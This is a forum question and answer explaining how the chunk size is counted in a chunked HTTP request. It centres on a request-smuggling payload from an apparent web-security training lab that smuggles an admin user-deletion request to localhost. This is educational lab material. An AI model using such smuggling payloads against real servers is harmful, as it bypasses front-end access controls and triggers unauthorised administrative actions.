How to count Transfer-Encoding: chunked chunk size

Question

I'm not getting that in Transfer-Encoding: chunked, how the size is counted. can anyone explain this chunk size please? thank you.

POST / HTTP/1.1
Host: your-lab-id.web-security-academy.net
Content-length: 4
Transfer-Encoding: chunked

87
GET /admin/delete?username=carlos HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

Answer 1

When studying about http request smuggling, I struggle too in working out how the chunk size is counted. I've found the example from wikipedia to be very helpful ( https://en.wikipedia.org/wiki/Chunked_transfer_encoding#Example).

So let me try to help you out here, as this is actually a good exercise for me too.

87
GET /admin/delete?username=carlos HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

87 there is in hex form. In decimal form, its 135. Thus the chunks size is 135 bytes.

Then, for every line below 87 we count every characters (assuming 1 character equals 1 byte) and then add 2 bytes for CRLF (\r\n), except for the last line above 0 which we don't need to count the trailing CRLF.

Thus it goes something like this:

GET /admin/delete?username=carlos HTTP/1.1 -> 42 + 2 bytes for \r\n = 44 bytes
Host: localhost -> 15 + 2 = 17 bytes
Content-Type: application/x-www-form-urlencoded -> 47 + 2 = 49 bytes
Content-Length: 15 -> 18 + 2 -> 20 bytes
 -> 0 + 2 = 2 bytes
x=1 -> 3 bytes

Thus in total there are 135 bytes of chunked data.

Hope this could help.